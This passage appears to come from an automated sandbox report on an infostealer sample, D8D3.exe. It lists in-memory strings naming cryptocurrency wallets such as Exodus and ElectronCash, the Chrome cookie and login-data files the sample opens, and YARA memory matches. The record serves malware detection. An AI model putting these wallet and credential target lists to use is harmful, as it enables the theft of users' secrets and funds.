Source: D8D3.exe, 00000013.00000003.441885976.000000000087E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: wlts_elecbch:ElectronCash;26;ElectronCash\wallets;*;-
Source: D8D3.exe, 00000013.00000003.441885976.000000000087E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: wlts_jaxxl:JaxxLiberty;26;com.liberty.jaxx;*;*cache*
Source: D8D3.exe, 00000013.00000003.517099850.000000000084F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\exodus\*w
Source: D8D3.exe, 00000013.00000003.441885976.000000000087E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: wlts_exodus:Exodus;26;exodus;*;*partitio*,*cache*,*dictionar*
Source: C:\Users\user\AppData\Local\Temp\D8D3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Local\Temp\D8D3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Users\user\AppData\Local\Temp\D8D3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\llpb1133.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\D8D3.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
Source: C:\Users\user\AppData\Local\Temp\D8D3.exe File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\

Remote Access Functionality

Source: Yara match File source: 00000000.00000002.313394418.0000000000851000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.313299344.0000000000720000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.443874552.00000000007E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.444700260.00000000021E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: 00000013.00000003.441885976.000000000087E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000003.462471829.000000000087E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000003.465231730.000000000087E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000003.511550380.000000000087E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000003.514324898.000000000087C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000003.517099850.0000000000874000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000003.464907460.000000000087E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000003.464370990.000000000087E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000003.462319085.000000000087E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000003.441770993.000000000083A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000003.464693455.000000000087E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000003.441770993.000000000087E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000003.444370287.000000000087E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000003.446299900.000000000087E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: D8D3.exe PID: 5128, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: llpb1133.exe PID: 2560, type: MEMORYSTR